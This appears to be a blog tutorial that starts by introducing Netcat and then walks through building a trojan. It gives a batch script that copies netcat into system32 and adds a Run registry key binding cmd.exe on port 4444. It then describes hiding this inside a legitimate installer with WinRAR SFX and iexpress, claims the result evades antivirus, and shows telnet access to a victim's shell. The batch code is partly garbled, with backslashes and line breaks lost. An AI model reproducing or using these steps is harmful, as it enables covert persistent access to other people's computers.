Netcat is one of the best and important tool that plays an important role in the field of IT security, Penetration testing or ethical hacking, it is also called Swiss-army knife for TCP/IP. Here TCP/IP does not show that netcat works for TCP only, it can be use for UPD also. The importance of Netcat is not a hidden truth you can use Ncat for many purposes.
If you are using some Linux distribution like Backtrack, Gnacktrack, Backbox or others than you can find Netcat on this, open terminal and type Netcat if it will response than you don’t need to install it.
In this article I will cover some basic and advance usage of Netcat but before going to actual tutorial I want to explain some background.
What Is Netcat?
Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. Unix has a CAT command and netcat has been designed to achieve the goal of Cat command you can use netcat on various operating system, Nmap team has been designed Ncat on the concept of Netcat, so it is primely the same thing.
What Netcat Can Do?
This is the most important and simplest question you might be wonder about it, the answer is that netcat can do various things but here is the most important stuffs.
- Banner grabbing
- File transferring
- Telnet usage
- Shell backdoor
Now let’s start the method. To do this we use a simple technique! 🙂
- Create a batch file that will add your Netcat into the system folder and can edit the registry of the windows. Wait you don’t need to create it because I did it for you.
SPAM off copy rcat.exe %systemroot%system32rcat.exe if errorlevel 0 goto regedit goto error :regedit reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v nc /d "%systemroot%system32rcat.exe -L -d -p 4444 -t -e cmd.exe" if errorlevel 0 goto ip :error echo something wrong with the program. goto end :ip echo write down the IP address from the table ipconfig :end echo end. nc -L -p 4444 -t
- Open a notepad and than save it to name.bat
- Download rcat and then copy rcat.exe into the same directory where name.bat exist
- Now we use winrar to combine these two file, select both and then right click on add to archive
- On the next window mark check on create SFX archive
- Go to advance tab and click on SFX option
- Fill out the options like at the figure below
- Change the tab to modes and place mark of hide all
- Almost done click OK than OK to create a file
- New file must be appear at the same directory
- We have combined it but now make it more compitable
- Click on the start than run and type iexpress
- iexpress wizard will start, click on next, then next (leave it as default), and then where it ask about package title write any title like test
- On the next two window click leave as a default and then you need to add your files.
- You need to add two files like I did (see figure below) one must a .exe file that we have made by using above method and the second file will be any setup file. iexpress combines them to make one.
- On the next window there will be two options, on the install program select the simple setup and on the post install command select the backdoor.
- On the next window place mark on hidden then click next
- Enter the name of the final file and place mark on first option (see figure below )
- On next window no restart and then don’t save, on the last create the package.
- Your new file must be appear on the same directory and here is the scan report. Its not crypter so you can scan on VT.
- New file has an ability to bypass the most famous antivirus software and it has contained our back door.
Let’s suppose our victim has executed the file. Now we can easily get the response via our command promote or terminal.
Why does it fail? Because our Netcat opened port number 4444. Look at the batch file code. Now check again.
[email protected]:~# telnet 192.168.1.8 4444
Connected to 192.168.1.8.
Escape character is ‘^]’.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Documents and SettingsBlacksheep>
You can use nc instead of telnet.